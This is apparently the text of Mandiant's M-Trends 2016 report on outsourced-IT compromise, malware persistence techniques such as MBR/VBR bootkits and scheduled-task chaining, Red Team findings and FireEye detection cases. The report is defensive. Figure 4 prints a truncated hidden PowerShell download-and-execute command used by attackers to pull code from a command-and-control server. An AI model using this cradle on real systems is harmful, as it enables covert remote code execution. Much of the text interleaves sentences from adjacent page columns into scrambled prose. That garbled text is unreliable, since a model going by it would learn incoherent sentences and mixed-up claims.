Figure 3 – Targeted Attack Lifecycle

This trend of ITO service provider providers and, where possible, via jump typically evaluate the Total Cost
compromise is significant because server for service providers to access of Ownership (TCO) in order to
it allows advanced attack groups a client network environment. If an determine the cost-benefit analysis of
to shortcut the Targeted Attack attacker is active inside an outsourced outsourcing. As companies evaluate
Lifecycle. When an attacker infiltrates service provider’s network, multi-factor TCO, it’s imperative that they know what
a targeted company’s network using authentication with a dedicated jump types of network security measures
the compromised ITO infrastructure, server can prevent them from being third-party service providers are
they have essentially skipped the first able to steal credentials and pivot delivering and how they’re executing
three phases of the lifecycle. There’s no directly into the end-client’s (victim) on defending their own infrastructure
need to craft an exploit or send a spear networks. Furthermore, any chosen from determined adversaries. Ensure
phishing email to the target company multi-factor solution should be tied to a they are employing both host-based
since they already have elevated corresponding user’s Active Directory and network-based detection and
privileges with unrestricted access. This account and not be valid for other response mechanisms. Validate that
shortcut allows the attackers to scale, accounts. Hardware-based tokens or they are actively monitoring systems
improving efficiency and reducing efforts phone-based tokens (such as those for indicators of compromise and that
required to complete their missions. delivered via SMS) are more secure they are responding accordingly. Factor
Compromising ITO service providers and options for multi-factor authentication. in the costs of data breaches into your
skipping multiple phases of the Targeted Be sure to actively monitor remote TCO model.
Attack Lifecycle makes it increasingly logons for any suspicious activity.
Incident Response Plan
difficult for attackers to be prevented
Monitor Use of Privileged Accounts Ensure your incident response plan
or detected. We expect this trend to
Monitor the use of privileged includes instructions on how to engage
continue until the cost of operating
accounts, including those associated with your outsourced service providers
through outsourced service providers
with outsourced service providers. during an incident. In particular, ITOs
becomes too great for the attack groups
Attackers target privileged accounts typically have robust change control
to bear. Then they will find an easier
as local administrator, domain procedures. Establish a defined process
method to accomplish their goals.
administrator, and service accounts. to efficiently navigate those change
Recommendations These are especially valuable inside controls during a breach so that
the ITO management systems since your incident responders can be as
Historically, large enterprises have
they can potentially be used across nimble as the adversary. Engage legal
been wary about migrating their IT
multiple clients/victims. While there are counsel to help manage risks during
infrastructure to the public cloud because
various products/solutions available to an incident, but carefully consider the
of perceived security risks. As we’re
help manage and monitor privileged communications with the ITO on legal
seeing in our investigations, the risks
accounts, organizations may consider matters – such as assigning blame for
associated with outsourcing IT services
something as simple as sending a daily the breach during incident response
may be just as concerning. Consider the
report to all privileged account holders – to avoid negatively impacting
following recommendations if you are
showing where they authenticated cooperation from the people that
engaging, or have already engaged, an
to, enabling astute administrators to manage your infrastructure. Counsel
outsourced IT service provider.
identify suspicious activity. will help balance legal considerations
Implement Multi-Factor Authentication with maintaining a positive working
& Jump Servers Total Cost of Ownership
relationship with the outsourced service
Implement multi-factor authentication As companies evaluate leveraging
provider in order to ensure an incident
mechanisms for all outsourced service outsourced service providers, they
is revolved quickly and effectively.




Mandiant has tracked the most sophisticated Historically, Mandiant has seen a large
threat actors over a span of more than 10 assortment of malware persistence techniques
years, and this experience has provided a that typically favored stability and simplicity
unique insight into the evolution of threat over stealth. The most simplistic persistence
actors’ tools, tactics, and procedures techniques involved creating or modifying a
(TTPs). One area of particular interest Windows service or adding malicious files to
is the persistence mechanisms threat registry run keys. Table 1 contains a sample
actors use to ensure their malware runs of common persistence techniques that
after a compromised system is restarted. Mandiant has identified and written about in
Understanding how malware maintains previous M-Trends reports.
persistence provides investigators with
excellent indicators of compromise (IOC)
that can be used to identify additional
compromised systems.

Table 1: Common historically identified persistence mechanisms


Windows services A Windows service is a program that is configured to start at system

boot time and run in the background. Attackers will often create a new
Windows service or hijack an existing one to maintain persistence.

Windows Registry The Windows Registry offers countless ways to ensure files are
executed on system startup.

DLL search order hijacking Through exploitation of the Dynamic-Link Library search order,
malicious files with a specific name and location can be loaded by
legitimate, vulnerable applications.

Modification of Group Policy Threat actors can instruct the system to start malware when a user logs
Objects (GPO) onto the system through the modification of GPOs that manage user

Use of Common Object Model COM objects provide a mechanism for applications to communicate
(COM) objects and interact with each other. By hijacking COM objects, malware can
be loaded when another application attempts to interact with the
COM object.

Modification of existing system Threat actors can modify existing legitimate system binaries to include
binaries malicious code that launches malware yet still operates as intended.

Windows scheduled tasks Threat actors can leverage Windows scheduled tasks to ensure the
execution of malicious files based on system triggers such as a specific
time or system startup.

Windows Management WMI provides a framework that can trigger applications to run based
Instrumentation (WMI) on changes to the state of specified objects. Similar to scheduled tasks,
this can included a specific time or at system startup.

Malicious Windows Security Windows security packages are a set of DLLs that Windows Local
Packages Security Authority (LSA) will load on system startup. A threat actor can
add a malicious security package to persist across system restarts.


Latest Persistence Mechanisms MBR Bootkit
One MBR bootkit that Mandiant identified,
While the tried and true methods of
known internally as RockBoot, specifically
persistence continue to provide malware
targets Windows XP, Windows Server 2003,
authors the stability they desire, threat
Windows 7, and Windows 2008/2012 operating
actors continue to develop new persistence
systems. The MBR bootkit works by hijacking
techniques that focus on stealth and
the boot process when the BIOS passes
obfuscation. The following are just a few of
control over to the MBR. This helps circumvent
the interesting persistence techniques that
traditional detection and prevention techniques
Mandiant has identified during investigations
since most technologies do not look at the MBR.
last year.
The threat actor installs the MBR bootkit with a
Master Boot Record (MBR) and Volume Boot 64-bit packed executable. When executing the
Record (VBR) Bootkits MBR bootkit installer, the threat actor provides
Last year Mandiant observed threat actors the file name for a backdoor that they want
modify the Master Boot Record (MBR) and the to remain persistent across system reboots.
Volume Boot Record (VBR) so that malicious The installer then drops a driver on disk, which
code executes before the operating system provides the attacker raw read-and-write access
is even loaded. This technique is known as to the disk. Ultimately, achieving this level of
creating a “bootkit.” On a Windows system, disk manipulation allows the attacker to the
the MBR stores information on how the install the MBR bootkit. During the installation,
partitions, which contain the file systems, are the malware iterates over all logical drives that
organized on the drive. The MBR identifies are formatted with NTFS and attempts to store
the active partitions on the disk and passes an encoded version of the backdoor, listed on
control over to the VBR. The VBR contains the command line, in two places – one as a file
code that loads the Operating System. Figure on disk and another in unallocated sectors near
1 presents a simplified version of the boot the end of the file system. The backdoor stored
process. in unallocated sectors serves as a backup in the
event the file present on disk is removed.

Figure 1: Simplified boot process

1 2

MBR VBR Partition 0 Spaced


The installer confirms that both copies of the • Stage 3 – Secondary Loader: Loads
backdoor are stored on disk, and then proceeds code that enables the installation and
to install the modified MBR. The installer first configuration of the backdoor. The stage
makes an encoded copy of the legitimate 3 code hijacks a preexisting Windows
MBR and writes it to unallocated space on the service by overwriting the service name
physical drive. The installer then copies sections with the location of the backdoor to
of the malicious MBR over the legitimate MBR, ensure the backdoor loads when the
preserving the original partition table and error Operating System starts. At the end
messages. The malware ensures that the MBR is of stage 3, control is passed back to
only modified on the physical drive that contains the legitimate MBR, which allows the
the file system where %WinDir% (indicative Operating System to boot.
of where the Windows operating system is • Stage 4 – Backdoor Loader: Loads the
installed) is located and that the MBR has not backdoor from disk. The stage 4 code also
previously been modified. replaces the hijacked Windows service
back to its original state and loads the
Four Stages of Execution legitimate service as expected.
Upon installation of the MBR bootkit, the
following four stages of execution occur upon Figure 2 provides a simplified explanation of
each subsequent reboot: the boot order with the MBR bootkit.

• Stage 1 – Malicious MBR: The Windows

BIOS loads the modified MBR, which then
loads the code in stage 2.
• Stage 2 – Initial Loader: Loads the stage 3
code that was previously stored as a file
on disk and in unallocated clusters.

Figure 2: Simplified MBR bootkit execution

4 Partition 0
Operating Unallocated
Bootkit MBR VBR System Spaced


VBR Bootkit 2. Available Space Calculations the Windows registry. These
Mandiant has identified targeted and Virtual File System Creation additional components contain
financial threat actors using a VBR – The installer calculates and the core command and control
bootkit to maintain persistence. identifies free space between functionality.
Mandiant refers to the bootkit as partitions on the disk that will
BOOTRASH. Similar to the MBR fit the creation of a Virtual File After the VBR bootkit is installed,
bootkit, the VBR bootkit targets System (VFS), which will store the subsequent reboots of the system
Windows XP, Server 2003, Windows backdoor components. load the malicious VBR code that then
7, and Windows 2008/2012 operating 3. Boot Sector Hijacking – The loads the backdoor. This occurs in the
systems. During the installation of the installer places an encoded following fashion:
VBR bootkit, the installer performs the backup copy of the VBR on the
1. The MBR loads the malicious VBR.
following actions: disk. The installer then overwrites
2. The overwritten VBR loads
the legitimate VBR to hijack the
1. System Check – The installer backdoor code from the VFS.
boot process on subsequent
gathers information on 3. The overwritten VBR passes
system starts.
the operating system and control to the copy of the
4. Backdoor Component Installation
architecture in preparation for legitimate VBS, which continues
– The installer places backdoor
installation. This includes checking the boot process.
components responsible for
whether an installer is already 4. The operating system boots and
creating and installing the
running and determining if the the backdoor is operational.
bootkit in the VFS. Additional
Microsoft .NET 3.5 framework is backdoor components can Figure 3 shows a simplified explanation
installed, a requirement for the be saved in either the VFS or of the boot order with the VBR bootkit.
backdoor. be stored as binary data in

Figure 3: Simplified VBR bootkit execution

1 2

3 4
Boot VFS
MBR VBR Partition 0 Spaced


Chaining Persistence to Avoid action. Used legitimately, this allows chain. Rather than simply creating a
Detection for daily administrative tasks to new Windows scheduled task and
In an effort to hide, attackers be accomplished such as system executing a malicious file, threat
have begun chaining persistence maintenance. Used maliciously, it actors are leveraging legitimate
techniques. Chaining persistence allows for the execution of files or for Windows utilities to download and
techniques involves using a multi-step maintaining persistence. execute malicious files. While this
approach to separate the execution technique has been possible for years,
of malware into separate stages. Historically, attackers have used attackers starting to put additional
The idea is to make the first link in Windows scheduled tasks in a emphasis on stealth in an attempt to
the chain appear to be benign or straightforward fashion. The most stay hidden.
innocuous so investigators mistake popular ways advanced attackers
it for being legitimate. Yet, when leverage scheduled tasks are one- One such attacker method we
you follow the chain further and time file execution and persistent observed is through the scheduled
begin putting the additional pieces malware execution. With one-time daily execution of PowerShell
together, the full picture comes into file execution, threat actors create a commands. The commands are
focus and the execution chain ends Windows scheduled task to execute a configured to contact a command and
with the execution of the threat utility or backdoor installer one time. control server and download malicious
actor’s malware. The following section For persistent malware execution, code. The code remains resident in
outlines how attackers are using threat actors can schedule malware memory and runs under a PowerShell
Windows scheduled tasks as the initial to execute at predefined times to process. At no point is the malicious
chain that leads to more sophisticated maintain persistence – it can be a code placed on disk – the only
methods of malware execution. daily occurrence or only on certain indication of evil is in the PowerShell
days. command line arguments configured
Windows Scheduled Tasks within the Windows scheduled task.
Windows scheduled tasks allow for These use cases provide a consistent Figure 4 contains an excerpt from
the automation of tasks on systems. method for attackers to persistently the Windows scheduled task file
The Windows Task Scheduler execute malware. More recently, we that contained the configuration to
monitors the system for specific observed threat actors expanding execute PowerShell.
criteria, often a specific time or event their use of Windows scheduled
such as a system startup or user tasks by introducing an additional
logon. When the condition is met, the level of complexity to the execution
Task Scheduler executes a predefined

Figure 4: PowerShell command from a Windows scheduled task file

<Actions Context=”Author”>
<Arguments>-w hidden -nologo -noninteractive -nop -ep bypass -c “IEX ((new-object net.webclient).download-


An added benefit of this approach is that because the persistence
mechanism reaches out to the command and control server to pull
down the malicious code, the attacker can update the code at will. In
the instances we observed, the malicious code may communicate with
a different command and control server every day, or do nothing at all.
Figure 5 contains an example of this persistence technique.

Figure 5: Windows scheduled task and PowerShell persistence

1. A time event triggers

a malicious Windows
scheduled task to execute

2. Arguments in the PowerShell command

instruct the system to download code
from an attacker controlled server

3. The attacker controlled server

stores code that provides backdoor
functionality, providing the attacker full
control over the system

4. The victim system loads the malicious

code in memory and runs under a
Windows Powershell process, never
touching the disk


Another technique we observed was the use of a Windows scheduled
task that threat actors configured to execute a Windows shortcut, known
as a LNK file. The threat actor created a LNK file that called PowerShell
with a command line argument to inject shellcode into an otherwise
benign Windows process. In the cases we worked, the threat actor would
store the shellcode that provided backdoor functionality on disk. Figure 6
contains an example of how the LNK file persistence works.

Figure 6: Windows scheduled task and LNK file persistence

1. The Windows scheduled task

runs when the system boots.
The scheduled task runs a
Windows LNK file that the
threat actor created

2. The Windows LNK is configured to execute

PowerShell. PowerShell command arguments supplied
in the LNK file instruct PowerShell to read shellcode
from a file present on disk and then injects the
shellcode into the PowerShell process.

3. The shellcode contains backdoor code

that begins communicating with the
attacker C2 server.


While the use of tried and true methods for malware persistence
remain rampant, malware authors continue to find new and innovative
techniques. Threat actors will continue to burrow deeper into systems,
in some cases going below the underlying operating system, in an
attempt to avoid detection and counter eradication attempts. As
investigators, it is imperative for us to understand malware persistence
techniques as they serve as a focal point for the investigation and help
drive a successful remediation.


Introduction typically consist of automated eliminated. Additionally, security
scanning, manual analysis by assessment results are only valid
For years, our community has
trained professionals using proven if the environment never changes,
recognized the value of security
methodologies, and even exploitation which is unrealistic. There will
testing as a way to proactively
of known vulnerabilities in order to always be uncertainty. No amount
identify and remediate vulnerabilities
demonstrate how an organization of vulnerability testing will be able
before an attacker can exploit
can be impacted. Ideally, for each to predict a patient human attacker,
them. Many of the companies
test performed and vulnerability one who will invariably find a way
engaged by Mandiant in 2015 have
remediated, the “Security Gap” gets to exploit a gap and breach an
internal capabilities for vulnerability
smaller. environment. Therefore, instead of
assessments and security testing, or
focusing only on identifying and
have outsourced those capabilities to
However, there is no such thing as remediating vulnerabilities, many
specialized firms – or they maintain
perfect security, and the “Security organizations have turned back to an
a blend of both. These programs
Gap” will never be completely


older testing paradigm favored by
How well does the security program protect the
the military and government – Red
Teaming (also known as: war gaming, critical assets (data, systems, and people) that truly
advanced threat simulation, etc). matter to the organization?

Mandiant has observed an increased How effective and efficient are the security teams
interest among our clients for
targeted testing and threat
simulations designed to emulate real-
2 at detecting targeted threat activity, recognizing
the severity of the threat, and responding properly
to protect critical assets and data?
world advanced attacks. Beyond the
capabilities of traditional vulnerability
assessments and penetration tests,
these “Red Team” events can answer 3 What gaps in the security program have been
overlooked or ignored?
the following questions:

4 Are you prepared to deal with a worst case hacking


When conducted properly, a Red Team engagement is an indispensable

tool for enhancing detection and response capabilities, and evaluating and
exercising a security program in a way that supplements traditional security
testing methods.


On Definitions
We recognize that there are no universally accepted definitions for the terms “vulnerability assessment,”
“penetration test,” and “Red Team.” Some companies purchase annual “penetration tests” consisting of
nothing more than an automated vulnerability scan using a commercial tool. Other companies regularly
engage in “penetration tests” that include social engineering campaigns, customized malware, and
targeted attempts to compromise critical business systems.

Our intent is not to incite a definition debate; however, in order to avoid ambiguity, we submit the
following definitions in the context of cybersecurity testing:

Vulnerability assessment: Example: A technical Vulnerability

Structured testing designed to assessment of the user interface, assessments help
holistically identify the security compiled code, configuration, organizations identify
flaws in a system, application, and network communication of known issues in their
or environment. Leverages the iOS and Android versions environments.
proven testing methodologies in of a mobile application prior to
attempt to identify all potential public release.
vulnerabilities. Can include both
manual and automated testing.

Penetration test: Testing of a that can be leveraged to Example: An insider threat

particular system, application, accomplish something that assessment of a biomedical
or environment for the purpose an adversary would also do. company in which Mandiant was
of accomplishing an adversarial Can include both manual and provided intranet access and
objective. In contrast to a automated testing, but is given the objectives of gaining
vulnerability assessment, this dependent on a human tester to access to executive email,
type of testing is not designed take advantage of exploitable research data, and PHI.
to be holistic; rather, the tester is weaknesses and accomplish the
attempting to find vulnerabilities end objective. Penetration tests add a
human element.

Red Team operation: Attack and respond to an advanced conducted from non-attributable
emulation using precision, threat actor. infrastructure. Mandiant was
creative thinking, and the also instructed to leave flags on
TTPs of an advanced and Example: The CIO of a major compromised systems to gauge
motivated adversary in order manufacturer engaged Mandiant the effectiveness of response
to accomplish a meaningful via a third party. His request: teams at detecting, tracking, and
objective against the target “Break in” to his organization and investigating the attack.
environment. Typically steal critical data. All vectors,
conducted outside the including social engineering, Red team engagements
knowledge of the IT and physical breaches, and even can fully mimic
security teams, the Red Team attacks against the parent and advanced attackers,
creates a realistic attack sibling organizations, were identify unknown
scenario based on emerging in scope. Except for the CIO, vulnerabilities and help
threats that both identifies the target organization had train your security staff
security gaps and gauges an no knowledge of the event, in a controlled attack
organization’s ability to detect and all testing was to be simulation


It is important to note that each of the three In his excellent presentation at USENIX Enigma
categories defined above add substantial value 20165, Rob Joyce, NSA TAO Chief, made the
and are important to an effective security following statement in the context of how
program. Many of the same tools and techniques the NSA performs reconnaissance against
used in a Red Team operation are also used target networks: “You (the defender) know the
during vulnerability assessments and penetration technologies that you intended to use in that
tests. Each type of testing produces relevant and network. We (the attacker) know the technologies
actionable findings that can be used to reduce risk that are actually in use in that network.” He
from cyber threats. emphasizes knowing your environment, and
goes on to highlight the importance of using Red
The key differentiator between Red Team Teams as a way to gain an understanding of your
operations and the other two categories of organization’s threat surface, and the value of
assessments is that Red Team operations provide assessing the environment from the perspective
a unique perspective into organizational readiness of an adversary. The necessity of this targeted
and attack resiliency. In addition to identifying testing is being realized by many organizations
critical security gaps at each layer of the security and increasingly used to supplement traditional
model, the Red Team also helps companies vulnerability assessments and penetration tests.
enhance their detection and response capabilities
(i.e. defending their environment) by subjecting
their security program to a realistic attack
scenario that is believable and relevant.

The Red Team also helps companies

become better at defending by
subjecting their security program
to a realistic attack scenario that is
believable and relevant

USENIX Enigma 2016 - NSA TAO Chief on Disrupting Nation State Hackers -


2015 security failure trends

The following observations are not intended to be an exhaustive

compilation or “Top X” listing of the security vulnerabilities that continue
to plague enterprises. As with every security firm and internal testing
team, we continue to encounter default credentials, missing patches,
poor input validation, outdated operating systems and other common
issues showing up on vulnerability reports everywhere.
Rather, these observations represent a common set of key issues identified during targeted
testing in which the target organization is unaware of the test (except for a small set of
stakeholders), and our testers have “carte blanche” to attack the organization using the same
TTPs of an advanced adversary.

Observation #1 – Credentials, in general • Cached credentials remain a major issue.

Captured credentials remain the most efficient In addition to the well-known password
and undetected technique for compromising dumping tools already available, the
an enterprise. Most notable are the following: weaponization of PowerShell and WMI
has resulted in multiple effective toolkits
• Many organizations still have not fixed that make targeting “high value” users
the password problem. In short, many and extracting credentials from memory
organizations still struggle with forcing almost trivial. These tools are fast, almost
users to use passwords that are sufficiently impossible to detect by AV, publicly-
complex and difficult to guess. There is available, and widely supported. Even with
plenty of research and statistics available detailed guidance from Microsoft regarding
on passwords6, and the issues specific to the protection of credentials7 and the
user password management have been built-in safeguards in modern Windows
acknowledged for a very long time. Modern operating systems, our Red Teams
enterprises have access to a variety of continue to have extraordinary success
robust solutions that address the problem retrieving credentials from memory and
with credentials, from password vaults reusing those credentials to move laterally
to multi-factor authentication to single throughout a network.
sign on. Yet passwords remain a systemic
problem for almost every client we • Single factor authentication. This
encounter, so we cannot discuss attacking architectural flaw has been discussed
without talking about passwords. and addressed for a long time, yet we
continue to see organizations expose
This issue is not just limited to the regular OWA, Citrix, SAP, and even VPN to
user population. Sysadmins, developers, the Internet behind single factor (and
DBAs, domain administrators, and even often Active Directory-integrated) login
security professionals continue to present pages. It is trivial to create a social
a huge risk to their own enterprises. These engineering campaign that tricks users into
users – who should know better and are “authenticating” with their AD credentials
highly targeted – remain some of the worst to a malicious site. Furthermore, it provides
offenders for choosing poor passwords or an attacker already within the environment
disregarding established policy. an alternative path that is virtually
indiscernible from normal user activity.
If you are on an IT or security team, know
this: The bad guys are coming for you and
they want your credentials. Do not make it
easy by having a poor password policy.

Credentials Protection and Management -


Observation #2 – Inability to detect targeted • Indicators on critical internal systems,
attacks or differentiate commodity activity including security controls, are being
from legitimate threat actors ignored. In 2015, Mandiant encountered
During targeted engagements where the multiple organizations that deployed
organization was unaware of the test (we refer best-practice security controls,
to this as “Zero Knowledge”), we observed including password vaults, two-factor
that security and operations teams continue authentication, data encryption, and
to miss important indicators of an attack in SIEM – but are not monitoring access
progress. From our experience, the root cause attempts or administrative activity on
lies equally across people, processes, and these controls! Given the high level of
technology. In short, most organizations are privileges under which these controls
not adequately staffing, equipping, training, execute and their importance to the
and exercising their detection teams. This security posture of the organization,
leaves defenders unprepared for actual they make a particularly interesting
attacks, and attackers with far too much time target. Our Red Team regularly leverages
to operate unobserved. compromised security infrastructure to
perform reconnaissance, gain additional
Examples include the following:
access, and even observe the security
• Although many endpoint security team’s activities. By not monitoring access
products have some ability to detect attempts and administrative activity on
common attack tools (e.g., web shells, these security controls, organizations
password dumping tools, RATs), alerts miss out on key indicators that a targeted
generated during testing are often attack is in progress.
ignored or incorrectly prioritized. In tests
This lack of awareness is not limited to just
where we intentionally generated an AV
security controls. Many organizations are
alert associated with credential dumping
not monitoring access attempts against
malware (e.g., Mimikatz), less than 10
critical internal business resources. In
percent of organizations recognized the
one Red Team engagement against a
alert as an indication of ongoing threat
particularly well-secured organization,
activity and responded appropriately. In
Mandiant successfully compromised
most cases, the security team was content
the enterprise intranet portal and used
to let AV quarantine the malware and
the portal to host malware for social
performed no additional investigation.
engineering attacks against other more
• Similarly, perimeter monitoring continues secure business units. The process of
to fail at differentiating ongoing finding and exploiting vulnerabilities
reconnaissance and exploitation from on the portal environment took several
typical alert background noise. While days. Furthermore, once the foothold
port scanners, brute force tools, and was obtained via a web shell, Mandiant
other “loud” techniques are often attempted unsuccessfully to obtain
observed, manual attacks – particularly elevated privileges on the server. These
against web applications – continue to exploitation attempts generated multiple
go largely undetected. In almost every log entries and even AV alerts, all of
test conducted by Mandiant in 2015, which were unnoticed or not acted upon.
organizations that had no prior knowledge In Mandiant’s experience conducting
of the test were unable to detect the targeted penetration tests and Red Team
attacks against their perimeter, even engagements, this lack of attention to
when those attacks resulted in successful internal security alerts was commonplace.
compromise and a full perimeter breach.


Observation #3 – Poor egress controls Use case: Mandiant performed a Red Team
Almost every organization has invested time operation against a client that claimed to
and money on hardening the perimeter to have strong DLP. One of the key objectives
reduce inbound attacks; however, limiting of the engagement was to see if their internal
egress traffic seems to remain a lower priority security team could detect data theft. We
than many other security initiatives. By not tested this by first connecting to a primary
prioritizing egress controls, environments domain controller, where we discovered that
allow malware, malicious internal users and the server could communicate directly with
attackers the ability to easily establish remote the Internet. Then, from the domain controller,
connections with untrusted Internet hosts, we then transferred a large set of Social
enabling command and control and data theft. Security numbers using unencrypted HTTP to
an untrusted external website.
• Not using the egress controls already
in place: While companies are investing Upon receiving the results, the client was
in new tools for endpoint security (DLP, skeptical that Social Security numbers without
email protection, network monitoring, associated personal information would not be
etc.), we continue to observe that many sufficient to trigger the DLP, so the dataset
are ignoring capabilities that already was expanded to include name, address, Social
exist in their network infrastructure and Security number, phone number, and credit
perimeter controls to block unnecessary card. Using the same transfer process, this
egress traffic. It is not unusual to find expanded dataset was extracted from the
unfiltered outbound connectivity to environment completely undetected.
untrusted external hosts via protocols
such as SSH, RDP, and DNS. While we While we do not know why the DLP failed
acknowledge the organizational pain of to detect the unencrypted outbound data
shutting off legacy egress connectivity, transfer of sensitive information in this
compared to deploying new technology, instance, in our experience this result is not
writing firewall rules is comparatively atypical and emphasizes the importance of
cheap. assessing security controls against realistic
attack activity.
• Inability to detect malicious egress
traffic and data theft. Almost every Red
Team engagement includes attempts
to establish outbound connections with
untrusted external systems, usually for the
purposes of faux data exfiltration. Only
in very few instances were the internal
security teams able to detect outbound
command and control or data theft
activities by our Red Team. Even when
outbound connections are blocked by
egress rules or web content filters, there is
often no associated alert or that alert gets
ignored. This gives the attacker time to
find alternate paths out of the network.


Conclusion However, we continue to see an increased
demand for targeted assessments that
Our intent is not to beat up on security
emulate advanced attackers, particularly
organizations and IT teams that are
among organizations with mature security
overwhelmed by the burden of maintaining
programs that view security as a constantly
and securing an enterprise, often with limited
evolving process that must be re-evaluated
staff, time, and money. We understand that
on an ongoing basis. These companies are
managing a comprehensive security program is
supplementing the vulnerability management
difficult, and we acknowledge that fixing known
program with annual or semi-annual targeted
vulnerabilities can take a long time and a lot of
Red Team assessments to challenge their
money. Additionally, many companies are just
security controls and exercise their detection
not able to invest as necessary to effectively
and response capabilities. By putting the
detect and respond to targeted attacks.
enterprise up against a realistic attack, these
For organizations that can acknowledge that companies can go beyond the question
there are significant gaps in their security of “Am I secure?” and start answering the
program, we do not always recommend question “Am I prepared?”
full-scale Red Team operations. Emphasis
should first be placed on maturing the security
program, educating users, and securing critical
infrastructure and assets. There is no point in
assessing the security of something known to
be insecure in your environment. For clients
that aren’t ready to test themselves against
a real-world adversary, more tightly scoped
vulnerability assessments and penetration
tests against key systems and applications
may provide more value.




FireEye as a Service (FaaS) provides detection services
across 4 million hosts at more than 200 clients, and routinely
deals with dozens of active events at any given moment. Days 0-11:
Our primary focus is the high-end APT and criminal threats. APT3 Use of 0-Day
This task is often complicated by a combination of multiple
advanced groups active against clients at any given time,
along with the presence of commodity issues.
Days 9-14:
Threat detection on a single host or even one client APT19 Compromise
environment is historically difficult, but conducting these
activities at speed and scale provides an entirely different
challenge. FaaS utilizes a combination of advanced Days 17-27:
intelligence, layered technology, and six Advanced Detection APT3 and APT18 Use of
Centers to ensure client detection in an around the clock and “Hacking Team” 0-Day
every day of the year model – all at speed and scale.

For example, in a single 30-day period FaaS identified two

distinct zero-day campaigns by multiple hackers supporting Days 19-30:
the Chinese government, an intrusion into a law firm by APT29 Compromise
Russian hackers with suspected state ties, and a separate
China-based intrusion into a manufacturer in the course of
our routine efforts.
Days 0-30:
FaaS conducted 11 surge
In June 2015, FaaS identified malicious spear phishing from
events, produced 325
APT3 against several clients. FireEye Threat Intelligence alerts to clients, 169 of
assesses APT3 is a highly proficient group of Chinese which were APT events
hackers who work on behalf of the Chinese government.
Within 24 hours, the combined FireEye enterprise
determined the emails contained a zero-day exploit for
Adobe Flash. Over the course of three weeks, APT3 targeted
14 FaaS clients with this zero-day and a range of other
malware tools.

With the FaaS follow-the-sun detection capability, we were

able to stay ahead of APT3 throughout this campaign, work
with Adobe to develop a patch, provide information to other
security vendors, and proactively provide all FaaS clients
with campaign updates. Through our work with the FireEye
Threat Intelligence team, FaaS identified 20 additional clients
previously targeted by APT3, began proactive advanced
detection for these 20 clients, and released APT3 indicators
to all FaaS clients. Five of these 20 clients were targeted in
the following weeks, with the advanced notifications and
actions preventing any APT3 success. FireEye has labeled
this event Operation Clandestine Wolf.8

Erica Eng and Dan Caselden, “Operation Clandestine Wolf—Adobe Flash Zero-Day in APT3 Phishing Campaign”,
23 June 2015, FireEye,


23:59 16:13
Making the Discovery of
Hand-Off the Backdoor

20:54 16:37
Identifying the Reporting the
Initial Attack Compromise and
Vector Recommendations

Watching and Learning

Within a week of Clandestine Wolf, FaaS observed APT3 The second significant intrusion occurred against a
and another China-based attack group known as APT18 manufacturer by APT19, a suspected Chinese origin
leverage a second Adobe Flash zero-day exploit against 18 group. APT19 initially used a backdoor to spread across
FaaS clients. APT3 and APT18 both discovered this zero- the environment and then harvested almost 6,000 valid
day vulnerability after unnamed hackers compromised an user accounts. Once they leveraged the accounts to gain
Italian intrusion software company known as The Hacking legitimate access, APT19 deleted tools and evidence of
Team and leaked their exploits online.9 their initial access in a significant counter-forensic effort.
FaaS quickly responded to this event using well-vetted
Similar to the Operation Clandestine Wolf case, FaaS knowledge of legitimate access detection methodologies
alerted on this activity immediately due to existing and intelligence on APT19 from the FireEye Threat
detections for these groups, despite the use of a separate Intelligence team.
zero-day exploit. After immediate response from the
targets, FaaS alerted all of our clients within 24 hours of FaaS expects adversary detection and response to
the first attempts and passed indicators for use at their continue growing in complexity and volume for the
discretion. This, in turn, prevented at least two separate foreseeable future. We see more activity from known
intrusions over the coming week when APT3 and APT18 actors as well as an ever-increasing range of new threats
expanded their target sets. each year. Additionally, clients field expanding types of
technology in an increasing global footprint. This in turn
During the widespread zero-day exploit use by APT3 and requires a wider range of detection technology for an
APT18, two other significant intrusions occurred. The first effective security posture. FaaS believes tight integration
involved APT29 – a suspected Russian origin threat group with Mandiant’s incident response efforts and a unified
– compromising an entity actively involved in Russian FireEye platform will allow for an effective response
oil interests. APT29 conducted numerous RDP sessions capability for our clients in this constantly shifting
disguised as valid normal SSL connections inside this operational environment.
client. The RDP sessions were used to place malicious code
within the firm, as well as steal multiple files.

Steve Ragan, “Hacking Team Hacked, Attackers Claim 400GB in Dumped Data”, 05 July 2015, CSO,


Year after year attackers implement new Victim organizations now face public
and interesting techniques to conduct their scrutiny, government inquiries, and lawsuits
malicious operations, and security teams get as never before. Breaches have also started
smarter and better equipped to combat those affecting average, everyday people, turning
techniques. In addition, the technology we rely the conversation from a strictly security-
on changes at a rapid pace, requiring us to focused conversation to one that non-security
figure out how to secure that new technology personnel can comprehend.
where there may be no precedent for security.
We have to constantly evolve our security
This “cat and mouse” game is what makes programs to keep up with the ever-changing
our industry so unique and challenging; threat landscape. This means treating our
“good enough” is just never good enough. security programs as an evolving process
Even though the median number of days and implementing safeguards — not just
compromised has been steadily declining best practices — to protect against attacker
over the last five years from when we activity. Part of that evolving process should
started keeping such statistics, 146 days is include partnering with organizations that
still too long, as the section on Red Teaming specialize in defending against the threats
demonstrates. specific to your business.

Breached organizations now have to worry

about so many factors other than questions
about what data was stolen, how the attacker
broke in, and how to remediate the situation.


For more information on Mandiant, visit:

FireEye, Inc.
1440 McCarthy Blvd. Milpitas, CA 95035
408.321.6300 / 877.FIREEYE (347.3393) /

© 2016 FireEye, Inc. All rights reserved. FireEye is a registered trademark of

FireEye, Inc. All other brands, products, or service names are or may be trade-
marks or service marks of their respective owners. SP.MTRENDS.EN-US.022016

You might also like